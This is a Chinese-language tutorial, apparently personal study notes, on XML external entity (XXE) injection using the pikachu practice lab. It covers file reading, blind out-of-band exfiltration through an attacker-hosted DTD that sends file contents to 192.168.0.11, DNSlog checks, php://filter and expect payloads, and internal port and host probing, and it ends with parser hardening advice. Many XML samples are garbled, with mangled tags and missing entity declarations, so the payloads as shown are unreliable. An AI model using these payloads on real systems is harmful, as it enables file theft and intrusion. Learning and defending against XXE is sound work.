XML是一种非常流利的标记语言,在解析外部实体的过程中,XML解析器可以根据URL中指定的方案(协议)来查询各种网络协议和服务(DNS,FTP,HTTP,SMB等)。外部实体对于在文档中创建动态引用非常有用,这样对引用资源所做的任何更改都会在文档中自动更新。但是,在处理外部实体时,可以针对应用程序启动许多攻击。这些攻击包括泄露本地系统文件,这些文件可能包含密码和私人用户数据等敏感信息,或利用各种方案的网络访问功能来操纵内部应用程序。通过将这些攻击与其它实现缺陷相结合,这些攻击的范围可以扩展到客户端内存损坏,任意代码执行,甚至服务中断,取决于这些攻击的上下文。
XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的元语言。
XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素
<!DOCTYPE note [
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT head (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]]]>
<note>
<to>Daveto>
<from>Tomfrom>
<head>Reminderhead>
<body>You are a good manbody>
note>
DTD(document type definition,文档类型定义)的作用是定义XML文档的合法构建模块。DTD可以在XML文档内部声明,也可以外部引用。
(1)内部的 DOCTYPE 声明
当DTD存在于XML源文件中,由以下格式进行包裹
DOCTYPE 根元素 [元素声明]>
然后XML文件对于DTD的内容进行引用
(2)外部文档声明
从XML文件外部引入DTD:
DOCTYPE 根元素 SYSTEM ”文件名”>
文件中存放的是元素声明,以.dtd后缀结尾。
(1)内部实体声明
<!ENTITY 实体名称 ”实体的值”>
DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe "test" >]>
这里定义元素为ANY说明接受任何元素,但是定义了一个XML的实体(实体其实可以看成一个变量,到时候我们可以在XML中通过&;进行引用)
<a>
<user>&xxe;user>
<pass>mypasspass>
a>
使用&xxe;对上面定义的xxe实体进行了引用,到时候输出的时候&xxe;就会被“test”替换。
(2)外部实体声明
<!ENTITY 实体名称 SYSTEM ”URI”>或<实体名称PUBLIC"public_ID ""URI">
DOCTYPE foo [
<!ELEMENT foo ANY >
]>
<creds>
<user>&xxe;user>
<pass>mypasspass>
creds>
上面将实体分为两个派别(内部实体和外部实体),但是实际上从另一个角度看 ,实体可以分为另外两个派别(通用实体和参数实体)。
(3)参数实体声明
<!ENTITY %实体名称 ”实体的值”>或者<!ENTITY %实体名称 SYSTEM ”URI”>
三种实体声明方式使用区别:
参数实体用%实体名称申明,引用时也用%实体名称;
其余实体直接用实体名称申明,引用时用&实体名称。
参数实体只能在DTD中申明,DTD中引用;
其余实体只能在DTD中申明,可在xml文档中引用。
<!ENTITY % an-element " mytag (subtag)>">
%an-element; %remote-dtd;
xxe即xml外部实体注入。指xml数据在传输过程中被利用外部实体声明部分修改,导致服务器器执行了被修改的恶意代码,造成了读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。
DOCTYPE ANY [
]>
<a>&xxe;a>
DOCTYPE ANY [
%d;
]>
<a>&xxe;a>
evil.dtd
DOCTYPE ANY [
%d;
]>
<a>&xxe;a>
evil.dtd
正常回显XXE是最传统的XXE攻击,在利用过程中服务器会直接回显信息,可直接完成XXE攻击。
报错XXE是回显XXE攻击的一种特例,它与正常回显XXE的不同在于它在利用过程中服务器回显的是错误信息,可根据错误信息的不同判断是否注入成功。
当服务器没有回显,就需要选择使用盲注了。可组合利用file协议来读取文件或http协议和ftp协议来查看日志。
1.查看受攻击机的服务器日志
2.通过Dnslog平台查看是否进行查询
3.Burp Collaborator Everywhere 插件验证
分析原理
xxe.dtd:
% send SYSTEM 'http://192.168.0.11?c=%file;'>">
payload:
DOCTYPE convert [
%remote;%int;%send;
]>
从payload中能看到连续待用了三个参数实体%remote;%int;%send;,这就是我们的利用顺序,%remote;先调用,调用后请求远程服务器上的xxe.dtd,有点类似于将xxe.dtd包含进来,然后%int;调用xxe.dtd中的%file;%file;就会去获取服务器上面的敏感文件,然后将%file;的结果填入到%send;后面(因为实体的值中不能有%,所以将其转换成html实体编码%#37;),我们在调用%send;把我们读取到的数据发送到我们远程VPS上,这样就实现了外带数据的效果,完美解决了XXE无回显的问题。
当允许引用外部实体时,通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。下面会结合pikachu靶场的xxe模块来实战演示。pikachu靶场的xxe是提供了一 个接收xml数据的api 。
靶场地址:https://github.com/zhuifengshaonianhanlu/pikachu
直接解压在www路径下即可。
PHP中可以通过FILE协议、HTTP协议和FTP协议读取文件,还可利用PHP伪协议。
XML在各语言下支持的协议有:
在实施攻击之前可以简单判断一下是否存在回显数据:
DOCTYPE ANY [
<!ENTITY xxe "菜鸟" > ]>
<a>&xxe;a>
可以看到回显了”菜鸟“,说明存在回显。(注意:只能判断是否存在回显,不能判断是否支持外部实体)
在知道存在回显后,可以尝试读取一些敏感目录,比如读取c:/windows/win.ini,它是每个windows系统都有的,linux系统的的话可以读取/etc/passwd,当然想要读取其他文件目录,只需更改绝对路径即可(file://协议只能用绝对路径)
payload:
DOCTYPE ANY [
]>
<a>&xxe;a>
有些XML解析支持列目录,攻击者通过列目录、读文件,获取账号密码后进一步攻击,如读取tomcat-users.xml得到账号密码后登录tomcat的manager部署webshell。
也就是上面所说的盲注xxe。
这里通过服务器请求包的信息来查看并读取文件。先准备测试环境,我靶场机所在ip为192.168.0.1,然后我使用另一台攻击机192.168.0.11上用python开启一个简单的http服务,在桌面打开终端输入下面命令:
python3 -m http.server 80
然后在桌面新建一个xxe.dtd文件写入下面内容
xxe.dtd:
% send SYSTEM 'http://192.168.0.11?c=%file;'>">
192.168.0.1靶机c盘下有一个xxe.txt,当然这里也可以读取其他文件:
payload:
DOCTYPE convert [
%remote;%int;%send;
]>
在提交数据后页面是什么都没有显示的,回到http服务器上,可以看到刚刚提交数据的请求包信息,xxe.txt里面的内容被警告base64加密后所外带显示出来了c=d2VsY29tZQ==
在线base64解密https://base64.us/,成功得到文件内容,具体执行效果前面文章已经介绍过了。
可以使受攻击服务器访问 DNS解析平台——http://www.dnslog.cn/或http://ceye.io/平台
payload:
DOCTYPE ANY [
%d;
]>
<a>&xxe;a>
说明XML解析成功,访问了te8sv4.dnslog.cn,具有XXE漏洞。
Collaborator插件位于extender模块下的Bapp Store,点击安装即可,在左上角打开Collaborator服务器:
点击复制到剪切 ,然后更换地址即可:
payload:
DOCTYPE ANY [
%d;
]>
<a>&xxe;a>
可以看到Collaborator中收到了DNS解析记录和HTTP访问记录:
查看php源代码一般用php伪协议php://filter
payload:
DOCTYPE ANY [
]>
<a>&xxe;a>
这种情况很少发生,但在配置不当/开发内部应用情况下(PHP expect模块被加载到了易受攻击的系统或处理XML的内部应用程序上),攻击者能够通过XXE执行代码。这里pikachu靶场演示不了。
payload:
DOCTYPE any [
]>
<user>&xxe;user>
XXE可以和SSRF(服务端请求伪造)漏洞(ssrf介绍文章请看:http://t.csdn.cn/fNFpi)一起用于探测其他内网主机的信息,基于http协议。
可根据返回信息内容的接收响应时间来判断该端口是否打开。这里最好利用burpsuite的intruder模块。
payload:
DOCTYPE foo [
]>
<foo>&xxe;foo>
先抓包,右键发送到intruder模块,然后设置载荷:
设置payload好后(这里为了方便快捷只探测1-100端口),开始攻击:
这时查看会发现它的响应状态都是200,这并不是所需的结果,需要按照发request包和回response包的间间间隔排序,这里设置一下所选列:
然后点击一下response received列,按大小排列,可以看到80和88端口接收响应计数为2,响应很快,代表这两个端口是开放的:
同端口探测一样,可根据返回信息内容的接收响应时间来判断ip是否存在:
payload:
DOCTYPE foo [
]>
<foo>&xxe;foo>
设置后 payload后开始攻击,查看response received列:
可以看到有192.168.0.11、10主机,对比下nmap扫描网段结果:
同读取任意文件一样,这里就不演示了。
XXE漏洞存在是因为XML解析器解析了用户发送的不可信数据。然而,要去检验DTD(document type definition)中SYSTEM标识符定义的数据,并不太容易,也不大可能。大部分的XML解析器默认对于XXE攻击是脆弱的。因此,最好的解决办法就是配置XML解析器去使用本地静态的DTD,不允许XML中含有任何自己声明的DTD。通过设置相应的属性值为False,XML外部实体攻击就能够被阻止。因此,可将外部实体、参数实体和内联DTD都设置为false,从而避免基于XXE漏洞的攻击。
PHP:
libxml_disable_entity_loader(true);
JAVA:
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
Python:
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
过滤关键字:、、SYSTEM、PUBLIC等。不允许XML中含有自己定义的DTD。
本文只是对xxe漏洞基础学习所做的笔记,简单通过pikachu靶场了解xxe漏洞的原理以及各种利用方法和思路,并未更加深入去剖析,感兴趣可以结合多个靶场和工具去实战。
靶场:
PHP靶场——bWAPP
https://sourceforge.net/projects/bwapp/files/latest/download
Java靶场——webGoat
https://github.com/WebGoat/WebGoat
DSVW靶场
https://github.com/stamparm/DSVW
XXE-lab
https://github.com/c0ny1/xxe-lab
vulnhub-xxe
https://download.vulnhub.com/xxe/XXE.zip
Mwtinfo6.0.0CMS
https://www.metinfo.cn/upload/file/MetInfo6.0.0.zip
工具:
XXEinjector
https://github.com/enjoiz/XXEinjector
以上是一些有xxe的靶场和工具,可以参考一下这位大佬的文章去实践https://xz.aliyun.com/t/6502#toc-21
参考文章:(这两篇文章都非常nice)
https://xz.aliyun.com/t/6502#toc-21
https://blog.csdn.net/elephantxiang/article/details/113812331